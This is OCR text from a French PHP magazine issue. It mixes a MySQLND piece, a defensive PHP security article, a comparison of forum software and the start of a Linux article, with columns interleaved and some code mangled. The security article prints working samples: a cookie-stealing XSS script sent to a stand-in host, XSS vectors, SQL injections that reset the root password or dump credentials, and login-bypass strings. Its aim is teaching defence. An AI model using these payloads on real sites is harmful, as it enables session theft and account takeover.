La licence de distribution de MySQLND est
une licence PHP car avant avec libmysql, cel-
le ci était sous licence MySQL. Cette licence
Alias
mysqli_execute
mysqli_store_result
mysqli_close
était développée par MySQL AB (puis Sun
et maintenant Oracle) et avec ce changement
d’orientation, cela résout les soucis de licence
problématique provoqué dans le passé, mais
aussi futur.
Autres extensions
Avec ce nouveau driver MySQLND, vous
pouvez aussi utiliser l’extension PDO_MyS-
QL, qui hérite de l’ensemble des avantages
du pilote natif MySQL pour PHP. Cette bi-
bliothèque est aussi associée à PHP et par
conséquent il n’est plus nécessaire de le lier
comme avant. Cette nouvelle extension
se trouve aussi sous licence PHP. Mais elle
a été complétement repensée, épurée, stable
et plus facile à compiler.
Conclusion
La librairie MySQLND est apparue pour ré-
pondre aux différents problèmes et attentes
des utilisateurs. Lorsque vous développez, il
est préférable d’utiliser la dernière version
de PHP pour bénéficier de l’ensemble de ces
nouveautés.
CHRISTOPHE VILLENEUVE
Consultant PHP pour Alter Way solutions, Auteur
du livre PHP & MySQL-MySQLi-PDO, Construi-
sez votre application, 2ème édition, livre français
aux Editions ENI. Trésorier AFUP et contributeur
de nombreux sites touchant PHP dont Nexen.net,
PHP Team, PHPTV...
Contacter l'auteur : http://www.hello-design.fr

44 4/2010
 MySQLND

www.phpsolmag.org 45
 Sécurité

PHP
et la sécurité
Le Common Vulnerabilities and Exposures (en abrégé
CVE) énumère plusieurs vulnérabilités affectant PHP.
Ces vulnérabilités peuvent être utilisées par des hackers
pour modifier le contenu ou le comportement d’un site
ou d’une application web PHP.
• A1 : Injection (SQL, OS et LDAP).
Cet article explique : Ce qu’il faut savoir : • A2 : Cross-Site Scripting (XSS).
• Les vulnérabilités liées au PHP. • Avoir des connaissances de base en PHP. • A3 : Broken Authentication and Session
• Les vulnérabilités liées aux formulaires. Management.
• Les vulnérabilités liées aux sessions. • A4 : Insecure Direct Object References.
• A5 : Cross-Site Request Forgery (CSRF).
• A6 : Security Misconfiguration.
• A7 : Insecure Cryptographic Storage.
• atteinte à l'intégrité et à la fiabilité des • A8 : Failure to Restrict URL Access.
données et du système les hébergeant ; • A9 : Insufficient Transport Layer Protec-
Niveau de difficulté • atteinte au contenu et au comportement tion.
du système gérant les données ; • A10 : Unvalidated Redirects and Forwards.
• etc...
Les vulnérabilités liées au PHP,
N.B : Les vulnérabilités évoquées dans cet le Safe Mode

L
e but visé n’est pas de vous mon- article ne sont pas propres à PHP ; elles tou- Le Safe Mode est le mode de sécurité de PHP :
trer comment utiliser les attaques chent également les autres langages. une solution au problème de partage de PHP
mais plutôt comment s’en prémunir sur un serveur. Ce système pêche au niveau
et comment sécuriser vos sites et vos appli- Liste des principales de l’architecture car il n’est pas correct de
cations web. vulnérabilités OWASP TOP TEN tenter de résoudre ce problème au niveau de
2010 PHP, mais les solutions alternatives basées sur
Un Rappel des risques liés L’Open Web Application Security Project (en le serveur web et le système d’exploitation ne
au manque de sécurité abrégé OWASP) est une communauté open sont pas réalistes. De nombreux intervenants,
Commençons tout de même par un bref rappel source qui travaille sur le développement notamment les fournisseurs d’hébergement,
des risques liés au manque de sécurité. En effet, et le maintien des applications web fiables utilisent le Safe Mode. Le Safe Mode est obso-
un site ou une application web non sécurisés et sécurisées. L’OWASP Top Ten est un clas- lète depuis PHP 5.3.0 et est supprimé dans
sont exposés au contournement de la politique sement qui recense les vulnérabilités les PHP 6.0.0. (Paragraphe tiré du site www.php.
de sécurité entrainant les risques suivants : plus répandues sur le web. La dernière ver- net).
sion de ce Top Ten a été officiellement pré-
• atteinte à la disponibilité et la confiden- senté le 19 avril 2010 et contient les failles Listes des fonctions
tialité des données ; suivantes : potentiellement vulnérables
Plusieurs fonctions PHP peuvent être utilisées
pour mener des attaques ; elles sont donc à uti-
Terminologie liser avec précautions. Les fonctions concer-
XSS : Cross Site Scripting. nées sont (la liste n’est pas exhaustive) :
PDO : PHP Data Objects.
SGDB : Système de gestion de base de données. • pack() et unpack() : elles sont à l’origi-
CVE : Common Vulnerabilities and Exposures. C’est un dictionnaire des informations publiques re- ne d’une vulnérabilité de type déborde-
latives aux vulnérabilités de sécurité. Le dictionnaire est maintenu par l’organisme MITRE, soute- ment de mémoire ;
nu par le Département de la Sécurité intérieure des États-Unis (définition tirée de Wikipédia). • unserialize() : Cette fonction peut
SESSID : Identifiant de session. être exploitée pour un accès non autori-
OWASP : Open Web Application Security Project. sé à des données ou l’exécution de code
arbitraire ;

46 4/2010

• addslashes() : elle peut être utilisée par
un hacker pour modifier des fichiers ar-
bitraires sur le système ;
• realpath() : Cette fonction ne traite
pas correctement des chemins d’accès
longs. Il est donc possible de réaliser l’in-
clusion arbitraire de fichiers ;
Ces vulnérabilités sont corrigées dans les ver-
sions 4.3.10 et 5.0.3.
Les vulnérabilités liées
aux formulaires, le cross site
scripting
Le cross site scripting ou XSS (à ne surtout pas
confondre avec les feuilles de style CSS) est
une attaque qui profite de l’absence de traite-
ments, de contrôles et de validations des don-
nées en provenance des utilisateurs pour exé-
cuter un code malicieux afin d’usurper et de
manipuler des données confidentielles. Ce
type d’attaque affecte le client Web. L’utilisa-
teur est orienté à son insu vers un site erroné
et malveillant contrôlé par son assaillant.
PHP n’a pas de mécanisme intégré de pro-
tection contre les cross-site scripting. C’est donc
au développeur qu’il incombe de résoudre ce
problème.
Les différents types de Cross
Site Scripting
Les attaques XSS sont de trois types :
• Local :
Un code JavaScript malicieux est exécu-
té dans l’environnement local de la vic-
time afin de récupérer des informations
contenues dans l’URL dans le but d’exé-
cuter des scripts locaux avec les privilè-
ges de l’utilisateur en cours.
• Persistant ou permanent :
Ce genre d’attaque permet d’effectuer
des attaques très puissantes et d’affecter
plusieurs utilisateurs à la fois. Il se pro-
duit lorsque les données saisies par l’uti-
lisateur ne sont pas vérifiées avant d’être
enregistrées dans une base de données
ou un fichier situé sur le serveur
• Non-persistant ou non-permanent :
C’est de loin le type de XSS le plus cou-
rant ; il intervient lorsque les données
fournies par l’utilisateur sont utilisées
par le serveur sans vérifications préala-
bles pour ensuite être affichées sans en-
codage des caractères spéciaux HTML.
Les balises utilisées par les
attaques XSS
Si la saisie du code JavaScript <script
type=»text/javascript»>alert('Attaque
XSS')</script>
www.phpsolmag.org
Vulnérabilités affectant PHP
Listing 1. Illustration d’une attaque XSS sur un formulaire
<form>
<input type="text" name="message"><br />
<input type="submit">
</form>
<?php
//on vérifie que le champs message n'est pas vide.
if (isset($ _ GET['message']))
{
//on crée un fichier messages.txt en écriture seule
$fp = fopen('./messages.txt', 'a');
//on écrit le contenu du champs message dans le fichier message.txt.
fwrite($fp, "{$ _ GET['message']}<br />");
//fermeture du fichier
fclose($fp);
}
//lecture du contenu du fichier message.txt
readfi le('./messages.txt');
?>
Listing 2. Script malveillant de redirection et de vol de cookies
<script>
document.location = 'http://exemple.com/vol _ cookies.php?cookies=' +
document.cookie
</script>
Listing 3. Exemple d’un formulaire sécurisé d’envoi de message
<form>
<input type="text" name="message"><br />
<input type="submit">
</form>
<?php
if (isset($ _ GET['message']))
{
$message = htmlentities($ _ GET['message']);
$fp = fopen('./messages.txt', 'a');
fwrite($fp, "$message<br />");
fclose($fp);
}
readfi le('./messages.txt');
?>
dans le champ d’un formulaire ou dans une être codé en base64 et placé dans une balise
URL génère une boîte de dialogue ; on peut Meta :
donc conclure que l’application Web est
faillible aux attaques XSS. <META HTTP-EQUIV="refresh"
Certaines attaques peuvent être effectuées CONTENT=»0;url=data:text/html;base64,
sans la balise <script></script>. D’autres PSPcxmzPS3qsWiipydCgzdHKzeDSLite2andX
fonctions JavaScript peuvent être utilisées BOX»>
comme par exemple :
Exemple d’une attaque XSS
• <body onload=alert('Attaque XSS')> Considérons un simple formulaire d’envoi de
• <b onmouseover=alert('Attaque messages pour illustrer une attaque XSS (voir
XSS!')>Salut!</b> Listing 1).
• <img src="http://exemple.com/not. Un utilisateur de mauvaise foi pourrait sai-
exist" onerror=alert(document. sir dans le champ message le script présenté
cookie);> dans le Listing 2.
Le prochain utilisateur qui visitera le site
Les filtres de contrôle peuvent aussi être avec JavaScript activé, sera automatiquement
contournés par l’usage des chaînes de ca- redirigé vers la page http://exemple.com/ ;
ractère encodées dans la balise img : <img tous les cookies associés au site seront inclus
src=javascript:alert(‘XSS attack')>. Les dans la requête de l’URL. Une écriture plus
notations UTF-8 offrent encore plus de possi- saine de notre formulaire d’envoi de messages
bilités aux pirates. Le script malveillant peut ressemblerait à ceci (voir Listing 3).
47
 Sécurité

• Les variables envoyées via URL doivent

Listing 4. Vérification de la durée de vie d’un formulaire être encodées en utilisant la fonction
<?php urlencode(). En effet, les URL peuvent
//création d'un jeton aléatoire à identifi ant unique haché en MD5 contenir des informations exploitables
$jeton = md5( HYPERLINK "http://www.php.net/uniqid"uniqid(rand(), TRUE)); par des assaillants.
//conservation de la valeur de la variable jeton dans une Session
$ _ SESSION['jeton'] = $jeton; • Il faut aussi veiller à ce que la variable re-
//Session contenant l'heure de création de la session jeton gister_globals soit toujours désactivée
$ _ SESSION['jeton _ time'] = time(); (register _ global = Off ). Cette va-
?>
riable située dans le fichier php.ini, lors-
Listing 5. Test de la durée de vie du jeton qu’elle désactivée empêche les variables
EGPCS (registres Environnement,
<?php
// Durée de vie du jeton fi xée à 120 secondes GET, POST, Cookie, Server) d’être
defi ne('DELAI _ MAXIMUM', 120); vues comme des variables globales. De-
//test de la durée de vie du jeton puis PHP 4.2, register_global est initia-
if($ _ POST['jeton'] == $ _ SESSION['jeton']
&& (time() - $ _ SESSION['jeton _ time']) <= DELAI _ MAXIMUM) lisé à off. Mais beaucoup d’hébergeurs
{ s’évertuent à activer cette variable afin
//actions à effectuer;
d’assurer le bon fonctionnement des
}
else scripts au détriment de la sécurité.
{ • Définition du nombre maximal de carac-
die('Jeton expiré !');
}
tères des champs des formulaires avec l'at-
?> tribut maxlenght de la balise <input>;

Listing 6. Création d’un nouvel utilisateur ayant des droits absolus Le Cross Site Request Forgeries
<?php Le cross site request forgeries ou CSRF (pro-
// la valeur 0; sert à terminer correctement la requête originale noncé Sea Surf) exploite les utilisateurs à leur
0;*
insu en les rendant complices des attaques
//création d'un super utilisateur
UPDATE user SET Password=PASSWORD('crack') WHERE user='root'; c’est à dire qu’il s’appuie sur l’authentifica-
//Nettoyage de certains caches internes de MySQL tion d’un utilisateur pour envoyer des requê-
FLUSH PRIVILEGES;
?>
tes HTTP afin de déclencher des actions mal-
veillantes de façon transparente aux yeux de
Listing 7. Révélation des mots de passe l’utilisateur piégé. Ce genre d’attaque à l’ap-
parence légitime est très difficile à détecter.
<?php
'
//combinaison de deux requêtes select Les moyens pour se protéger
union select '1', concat(username||'-'||password) as name, '1982-04-25', '0'
from User;
des CSRF
-- Contrairement aux attaques, il n’existe pas
?> de techniques fiables pour se protéger des
CSRF. La prévention est le moyen le plus effi-
Listing 8. Exemple de code de protection contre la fixation de session
cace pour y remédier ; il faut donc appliquer
<?php un certain nombre de mesures :
//Initialisation de la session
session _ start();
//Récupération et modification l'identifi ant courant de session • Optez pour l'utilisation de la métho-
$old _ session = session _ id(); de POST plutôt que pour la méthode GET
//Test si la session est vide
dans vos formulaires.
if (empty($ _ SESSION['valide'])){
/ * Remplacement de l'identifi ant de session courant par un • Utilisez des jetons pour vérifier la durée
nouveau tout en conservant les valeurs de session. */ de vie des formulaires (voir Listing 4).
session _ regenerate _ id(TRUE);
$ _ SESSION['valide'] = TRUE;
} Le code de vérification du jeton doit être ap-
?> pliqué à un formulaire contenant un champ
jeton de type hidden (Listing 5).

L’ajout de la fonction htmlentities (Lis-
ting 3) permettra de convertir les chaînes de
caractères en entités HTML. Cette conver-
sion empêche le navigateur de traduire les
caractères en entité HTML ; ce qui désactive
complètement les codes et les scripts postés
par des utilisateurs malveillants. Ainsi le na-
vigateur interprètera le script ajouté par le pi-
rate comme étant du texte brute sans redirec-
tion ni vol de cookies. Le message posté par
le pirate sera affiché comme un texte anodin
et inoffensif.
Les méthodes pour éviter
les attaques XSS
• On ne le dira jamais assez ; le contrôle
des données entrées par les utilisateurs
est indispensable. En effet, pour les si-
tes sur lesquels les textes soumis par les
utilisateurs sont visibles à tout le monde,
il faut veiller à ce que les utilisateurs ne
soient pas en mesure d'activer du code et
des scripts qui pourraient nuire à l'image
de ces sites.
• Utilisez un Captcha avant chaque action
critique (ajout, suppression, édition)
pour être sûr que c’est bel et bien l’uti-
lisateur qui a demandé l’exécution de
cette action et non un robot automatisé
malveillant.
Les injections SQL
Beaucoup de webmasters et développeurs
semblent ignorer la puissance et la por-
tée que peuvent avoir une simple requête
SQL et qu’entre les mains d’un fin pirate,

48 4/2010

une requête SQL peut être utilisée pour
contourner les contrôles, détourner des in-
formations confidentielles, compromettre
la sécurité et/ou donner accès aux comman-
des d’administration. Il faut aussi préciser
que les injections SQL s’exécutent du côté
serveur.
Exemples des injections SQL
Nous allons voir que le manque de contrô-
le des données fournies par les utilisa-
teurs peut avoir des conséquences désas-
treuses comme la création d’un nouvel
utilisateur ayant des droits absolus sur le
système(Listing 6) ou la modification d’un
mot de passe (Listing 7) par un utilisateur
non autorisé.
Une autre attaque très répandue consiste
à forcer l’analyseur SQL à ignorer le reste de
la requête. Supposons qu’un site web utilise
la requête SQL suivante pour authentifier les
utilisateurs :
$req=»select * from USERS where
login='».$_POST[«login»].»' and
password='».$_POST[«password»].»'»;
Un pirate pourrait saisir les informations sui-
vantes :
login = ilyan’ -- (l’utilisateur ‘ilyan’ est bel
et bien existant dans la base de données),
passwd = toto (mot de passe aléatoire).
La requête devient donc :
$req=»select * from USERS where
login=' ilyan' -- and passwd='».$_
POST[«password»].»'»;
Les caractères ‘--’ indiquent un début de com-
mentaire en SQL. La requête envoyée par
le pirate équivaut donc à : $req=»select *
from USERS where login=' ilyan';
Le pirate a ainsi réussi à injecter les carac-
tères de son choix pour modifier le compor-
tement de la requête. Dans le cas où le pi-
rate ignore complètement le login et le mot
de passe ; il pourrait saisir les informations
suivantes : login = a’ or ‘a’=’a ; passwd = a’ or
‘a’=’a. Ce qui donne : $req=»select * from
USERS where login='a' or 'a'='a' and
passwd='a' or 'a'='a'»;
La condition ‘a’=’a’ est toujours vérifiée.
Ce qui implique que le pirate a encore réussi
à outrepasser les règles de sécurité mises en
place par le webmaster.
Quelques mesures préventives
contre les injections SQL
Les mesures énumérées ci-dessous peuvent
être appliquées pour éviter les injections SQL
(la liste n’est pas exhaustive ) :
[email protected]
.
www.phpsolmag.org
Vulnérabilités affectant PHP
Sur Internet
• http://www.php.net/ChangeLog-5.php#5.2.13 – Liste des changements apportés à la ver-
sion 5.2.13 de PHP du 25 février 2010,
• http://www.certa.ssi.gouv.fr/ – Centre d’Expertise Gouvernemental de Réponse et de Trai-
tement des Attaques informatiques,
• http://julien-pauli.developpez.com/tutoriels/securite/developpement-web-securite/ – Déve-
loppement web : Généralités sur la sécurité,
• http://www.owasp.org/ – Site de l’OWASP,
• http://www.dvwa.co.uk/ – Damn Vulnerable Web App (DVWA) est une application PHP/
MySQL vulnérable mais légale permettant de tester des outils de sécurité et d’effectuer
des études pour comprendre les mécanismes de fonctionnement des attaques pour
mieux s’en prémunir.
• L'utilisation des procédures stockées elle concerne les utilisateurs qui n’accep-
(Les procédures stockées sont implémen- tent pas les cookies.
tées depuis la version 5.0 de MySQL. ). • La fixation : elle consiste à fixer l’identi-
• L'utilisation des expressions régulières fiant de session avant que le serveur n’en
pour vérifier que les données saisies par attribue un. Le mécanisme de cette atta-
l'utilisateur correspondent au format at- que est le suivant :
tendu. 1. Le pirate visite une page et fixe l’iden-
• Si une valeur numérique est atten- tifiant de session à 666 (http://exem-
due, PHP dispose d’un large éventail de ple.com/login.php?PHPSESSID=666)
fonction de validation (is _ numeric(), puis envoie ce lien à sa cible.
ctype _ digit() , etc...), ou bien modi- 2. L’utilisateur piégé clique naïvement
fier automatiquement le type avec la sur ce lien, s’il n’a pas de cookie dé-
fonction settype() ou avec sprintf(); jà actif ; il va donc initialiser la ses-
• Ne pas afficher les informations pouvant sion 666 et s’identifier avec son lo-
révéler la structure de la base de don- gin et son mot de passe.
nées. 3. Le pirate revient sur http://exemple.
• L'utilisation des comptes ayant des droits com/login.php?PHPSESSID=666 et cet-
limités pour se connecter à la base de te fois avec la session de sa victime.
données.
• Protégez vos requêtes par l'utilisation Pour éviter ce genre d’attaques ; il suffit de
des fonctions telles que mysql _ real _ bien paramétrer le fichier php.ini :
escape _ string(). Il est important de • fixez la variable session.uses-trans-
signaler qu’une connexion MySQL est sid à 0 pour empêcher la diffusion du
nécessaire avant l’utilisation de la fonc- sessid ;
tion mysql _ real _ escape _ string(); • fixez la variable session.uses-only-
à défaut de cela, une erreur E_WAR- cookie à 1 pour obliger le serveur à pas-
NING sera générée. ser via les cookies pour la propagation du
• Le hashage du login et du mot de passe sessid ;
avant de les stocker. • utilisez un script de protection qui per-
met de bloquer les sessions étrangères
Les vulnérabilités liées et de générer des identifiants de session
aux sessions, le vol des sessions (Listing 8).
Les sessions constituent une mine d’or pour
les pirates ; c’est pourquoi elles sont la cible de Conclusion
nombreuses attaques menant à l’usurpation Le nombre d’attaques ciblant les sites
d’identité. Il existe trois catégories d’attaques et les applications web double d’une année
de session : à l’autre. C’est pourquoi, les développeurs
et/ou programmeurs doivent prendre en
• La prédiction : Comme son nom l’indi- compte la gestion des vulnérabilités affectant
que, cette technique a pour objet la pré- les applications Web et accorder une atten-
vision des identifiants de session. Il est tion toute particulière à la sécurité de leurs
nécessaire de préciser que les identi- applications.
fiants de session sont générés de façon
aléatoire ; il y a donc très peu de probabi-
lité qu’un pirate arrive à deviner un iden- DONY CHIQUEL
tifiant. Dony Chiquel est un ingénieur développeur spé-
• La capture ou l’interception : Cette atta- cialisé en technologies .NET et en conception ob-
que consiste à intercepter les identifiants jet avec UML pour BUGOVER. Contacter l’auteur :
de session véhiculés par la méthode GET,
49
 Pour les débutants
Un comparatif
de forums PHP
Quand on a un site qui se développe, il peut être
nécessaire de créer un espace de discussion : un forum.
En faisant des recherches, vous constaterez que l'on peut
se retrouver perdu avec les différents types de forum
trouvés. Dans cet article, essayons d'y voir plus clair.
Cet article explique :
• Les plus et plus moins des principaux fo-
rums en PHP.
Niveau de difficulté
L
es premiers forums dignes de ce nom
sont nés aux débuts des années 2000
et ils se sont largement développés
avec l’arrivée de la notion de web 2.0 . Qui
dit croissance, dit concurrence, dit large aug-
mentation de l’offre et au final, le webmaster
sera un peu perdu dans son choix.
Alors, s’il est indéniable qu’un forum ap-
porte à un site, il ne faut pas faire n’importe
quoi car la charge de travail est importante et
la migration vers un autre type de forum sera
très fastidieuse.
Avec un forum, l’internaute va découvrir
une autre partie de votre site où il pourra par-
ticiper aux échanges, proposer des idées. Cet
article vous propose de décortiquer, d’ana-
lyser, de comparer 5 forums développés en
PHP.
PhpBB
Ce forum est très probablement un des pre-
miers à avoir vu le jour sur Internet. Fort
de cette position et renforcée pour une
communauté importante et fidèle – plu-
sieurs millions de forums de ce type dans
le monde -, ce type de forum est toujours
bien placé.
Après avoir téléchargé la dernière version,
référencée «Olympus» 3.0.7-PL1 qui date de
50
Si la console d’administration peut paraî-
Ce qu'il faut savoir : tre lourde au début, elle devient rapidement
• Le principe d'un forum. conviviale.
Points forts : communauté française im-
portante, beaucoup d’outils existent. Points
faibles : les pirates connaissent bien phpBB,
beaucoup de tables dans la base de don-
nées.
mars 2010 , l’installation se passe sans diffi-
culté majeure. Voir la Figure 1. PunBB
Maintenant que vous avez téléchargé la ver- PunBB a été pratiquement le premier réel
sion, il faut se rendre sous le répertoire install concurrent à phpBB. La dernière version est
pour effectuer l’installation. référencée 1.3.4.
Cette installation se fait en moins de 5 mi- L’installation diffère globalement de celle
nutes. Au préalable, il faut cependant créer la de phpBB mais au final, en quelques clics, elle
base de données (par exemple via l’outil php- est effectuée correctement. Voir la Figure 2.
MyAdmin) et après l’installation, une vérifi- Même remarque pour PunBB que pour
cation est effectuée. phpBB au sujet du préfixe des tables dans
Ainsi, vous allez devoir vous connecter sur la base de données et concernant la création
votre serveur puis supprimer le répertoire ins- préalable de la base de données du forum.
tall. Une suppression totale de ce répertoire est A la fin de l’installation, punBB propo-
en effet préférable au niveau de la sécurité. se de se connecter automatiquement à la
Le plus souvent, le webmaster laisse com- console d’administration du forum et plus
me préfixe des tables qui seront créées phpbb particulièrement à toute une série d’infor-
(voir la première image de l’ordonnancement mations concernant votre serveur. Voir la
de l’installation). Changer ce préfixe peut Figure 3.
être un élément de sécurité de lutte pour les Beaucoup de webmasters sont passés d’un
pirates ou du moins, changer de préfixe fera forum phpBB à un forum punBB. Le forum
perdre du temps aux pirates et les pirates dé- punBB présente quelques avantages non né-
testent perdre du temps. gligeables.
Avant d’ouvrir réellement votre forum sur Points forts : peu de tables dans la base de
votre site Internet, il est nécessaire de pas- données, croissance importante. Points fai-
ser du temps – et le plus possible au début bles : communauté française moyenne, man-
– pour administrer votre forum. que de versions.
Sur Internet
• http://www.phpbb.com/ – Pour installer le forum phpBB,
• http://punbb.informer.com/ – Pour installer le forum punBB,
• http://www.invisionpower.com/ – Pour installer le forum Invision Power Board,
• http://www.vbulletin.com/ – Pour installer le forum vbulletin,
• http://www.simplemachines.org/ – Pour installer le forum SMF.
4/2010
 Forums PHP

SMF
Terminons par un autre forum php gratuit : SMF comme Simple Ma-
chines Forum.
Nous avons installé la version référencée SMF 2.0 RC3. Le premier
intérêt de SMF est lors de l’installation. En effet, cette installation ne se
fait pas en téléchargeant une archive mais simplement en téléchargeant
un fichier de … 60 KO.
Il faut se rendre sur le site officiel de ce forum – http://www.simple-
machines.org/ – puis après avoir cliqué sur Download, on se rend en bas
de la page dans la partie Webinstall – The simple way to get SMF.
Pour le webmaster, c’est intéressant de ne télécharger qu’un petit
fichier. Pour la suite de l’installation, pas de changement particulier.
Après avoir copié le fichier d’installation dans le répertoire souhaité, il
suffit de suivre l’installation pas à pas. Voir la Figure 4.
Lors de l’installation, on remarque également que l’on peut choi-
sir la langue française, ce qui est toujours préférable quand on n’est
pas bilingue. De plus, on constate également que les étapes sont bien
décrites pas à pas et que l’on peut suivre l’état d’avancement douce-
ment.
Quant à la console d’administration, elle ressemble à celles des
autres forums gratuites.
Quant à la communauté française, elle est visible sur ce site : http://
www.simplemachines-fr.org/ . Elle n’est pas très active et comptabilise
moins de 1000 membres mais elle augmente tout de même.
Points forts : installation possible avec un seul fichier, croissance Figure 1. Ordonnancement des pages lors de l’installation d’un forum
importante. Points faibles : communauté française limitée, beaucoup phpBB
de tables dans la base de données.

Vbulletin
Après avoir décrit plusieurs forums de type PHP gratuits, il est intéres-
sant de comparer avec une version payante. En effet, si la majorité des
forums sont gratuits, il existe des versions commerciales donc payan-
tes. Pour ce premier exemple, on va regarder Vbulletin.
Vbulletin a publié une version 4 mais malheureusement, rapide-
ment, il a été découvert une faille XSS. La dernière version stable est la
4.0.2 Suite PL1 . S’il n’est pas rare de découvrir une faille rapidement
avec la mise en production d’une nouvelle version, il est étonnant que
cela arrive pour une version commerciale.
Un patch de correction a été mis à disposition dans un délai court
mais ceci provoque toujours du travail supplémentaire pour le web-
master.
La version forum basique de Vbulletin coûte environ 135 euros. Il
existe également une version payante que l’on pourrait nommer suite
Vbulletin qui coûte environ 190 euros. Les prix sont dégressifs en fonc-
tion du nombre de version achetée. Voir la figure 5.
Alors, quelles sont les différences majeures entre les deux ver-
sions ?
Pour l’offre majeure (nommée suite Vbulletin), on peut créer des
tickets de support et il est également possible de créer des blogs. A no-
ter également que l’on peut créer un site de type CMS. Pour voir un
exemple des possibilités de cette option de Vbulletin, rendez-vous sur
la page d’accueil du site officiel de Vbulletin, partie forum puis choix
Home.
Voici une liste non exhaustive des possibilités :

• Ajax widget, gestion des articles, gestion des derniers articles,

gestion des articles les plus lus, gestion des articles les plus com-
mentés, gestion des catégories. Pour suivre l'actualité de Vbulle-
tin, nous conseillons ce site : http://www.vbulletin.org.

La langue anglaise est la version de référence pour Vbulletin, ce qui

n’étonnera personne. Cependant, il est à noter une forte commu- Figure 2. Ordonnancement des pages lors de l’installation d’un forum
nauté Vbulletin en Allemagne et il existe un site dans cette langue : punBB

www.phpsolmag.org 51
 Pour les débutants
Figure 3. Informations après l’installation d’un forum punBB
Figure 4. Ordonnancement des pages lors de l’installation d’un forum SMF
Figure 5. Exemple de forum et de CMS d’un forum Vbulletin
52
http://www.vbulletin-germany.com/ , qui recense près de 30 000 mem-
bres. Mais intéressons-nous à la langue française. Une communauté
existe, forte de plus de 15 000 membres. Le site de référence en
langue française est accessible à cette adresse : http://www.vbulletin-
fr.org/.
Points forts : installation possible d’un CMS, de blogs, communau-
té française en développement. Points faibles : payant, le manque de
mise à jour du site www.vbulletin-fr.org.
Invision Power Board
Autre forum bien implanté et payant : Invision Power Board, connu
sous le terme abrégé IPB. Nous avons vu pour le forum payant Vbul-
letin qu’il était tout de même possible d’installer une version de test.
Pour le forum Invision Power Board , ce n’est pas possible.
Pour en savoir plus sur ce forum, il faut se rendre sur le site officiel
http://www.invisionpower.com/ – puis demander une démonstration
en cliquant sur Sign Up Now . Vous arrivez alors sur la page suivante
http://www.invisionpower.com/products/demo.php et entrez votre adres-
se email.
Quelques secondes après, vous recevrez un email pour confirmer
votre demande de démonstration. Un email plus tard, vous avez un
lien donné, suivez ce lien et vous obtenez votre forum de démonstra-
tion pour 48 heures, pas une de plus. Voir la figure 6.
Dans la version de démonstration, vous pourrez visualiser des fonc-
tionnalités très intéressantes de ce forum. Vous pourrez facilement
créer des blogs, proposer un calendrier et aussi mettre en place une
galerie photos très jolie.
Le plus de ce forum est la console d’administration qui est tout sim-
plement énorme. Faire une liste exhaustive serait trop long et on peut
se demander ce qui n’est pas possible à partir de cette console ! C’est là
le grand plus de ce forum. Voir la figure 7.
On vient d’évoquer le grand plus de ce forum et maintenant, on va
évoquer le grand point négatif : le prix.
Pour avoir la configuration de base ainsi que des options classiques,
il faut dépenser environ 10 dollars par mois. Mais pour ce forum, plus
il y a de monde connecté sur le forum, plus le webmaster paie et le prix
augmente vite.
Pour donner un exemple, avec seulement 65 utilisateurs en ligne
simultanément, le prix passe à 45 dollars par mois. Si vous avez un
très gros forum – avec 750 utilisateurs en ligne simultanément – le
prix monte à 590 dollars par mois. Avec de tels tarifs, vous allez de-
voir passer du temps à chercher des partenaires publicitaires.
Si vous avez un souci technique ou autre, vous pouvez tout à fait
joindre la communauté française de ce forum à cette adresse : http://
www.invisionpower.fr/.
4/2010
 Forums PHP

Tableau 1. Récapitulatif et comparatif des forums décrits dans cet article

Forum/Critère Installation Gratuit/Payant Communauté Administration Nombre de tables

créées
PhpBB Téléchargement, transfert, clics. L'installation se fait Gratuit Très importante Bonne 62
en moins de 10 minutes.
PunBB Téléchargement, transfert, clics. L'installation se fait Gratuit Moyenne Bonne 19
en moins de 10 minutes.
SMF L'installation est vraiment optimisée, elle se fait en Gratuit Petite Bonne 63
5 minutes.
VBulletin On voit l'installation se faire étape par étape. Le Payant Importante Bonne N/A
contenu est important, l'installation se fait en moins
de 15 minutes.
Invision Power On voit l'installation se faire étape par étape. Payant Importante Excellente N/A
Board L'installation se fait en moins de 10 minutes.

Points forts : la console d’administration, la communauté française.

Points faibles : payant, forte hausse du prix en cas de fréquentation im-
portante du forum.

D’une façon générale

Concernant les trois forums gratuits testés, avec les dernières versions,
il est tout à fait possible d’intégrer un design à votre forum proche de
celui de votre site. Les consoles d’administration actuelles sont suffi-
samment complètes pour répondre à 95% de vos souhaits ou de vos
exigences.
Pour les 5% restants, il existe toute une série de thème, toute une
série de skin qui vous permettront d’atteindre votre objectif. Et au
pire, globalement, vous pourrez compter sur les communautés. Mais
n’oubliez-pas qu’au final, c’est votre forum et que vous aussi, vous
pouvez apporter votre pierre à l’édifice des différentes communautés.
Vous verrez, les débuts seront difficiles mais après un certain temps,
vous serez tout à fait à l’aise et reconnu.
Tableau récapitulatif des forums rencontrés.

Conclusion
Un webmaster connaît probablement d’autres webmasters. Le pre-
mier réflexe à avoir est de se renseigner auprès d’eux pour en savoir
plus sur le forum utilisé. A partir de telles informations et de cet
article, le choix d’un forum peut se faire plus facilement. Un forum
doit être jugé non seulement en fonction du paramètre prix mais éga-
lement en fonction de la charge serveur. On peut voir dans le tableau
récapitulatif que chaque type de forum a un sérieux atout. Pour
phpBB, on peut compter sur une communauté très importante mais
ce forum utilise plus de 60 tables alors que pour punBB, si la com-
Figure 6. Le forum IPB en démonstration munauté est moins grande, il en est de même pour la charge serveur,
donc il peut avoir plus de monde sur un serveur donné que pour le
type phpBB.
Suivant votre budget, suivant le temps que vous avez à consacrer
à votre forum, vous avez déjà limité l’offre. A vous de faire le bon
choix.

Figure 7. La console d’administration d’un forum IPB
ERIC VINCENT
Eric VINCENT est informaticien de gestion à l’origine et il s’est orienté vers In-
ternet au début des années 2000. Il a créé plusieurs sites Internet thémati-
ques, principalement sur le sport et il possède un forum thematique très im-
portant. Pour contacter l’auteur : [email protected]

www.phpsolmag.org 53
 Linux

Puppy Linux / Toutou Linux

une distribution très légère
et à la pointe de la technologie !
Emmenez partout avec vous cette distribution
très légère mais très performante et à la pointe
de la technologie !

une session sur le support. Lorsque celui-ci

Cet article explique : Ce qu’il faut savoir :
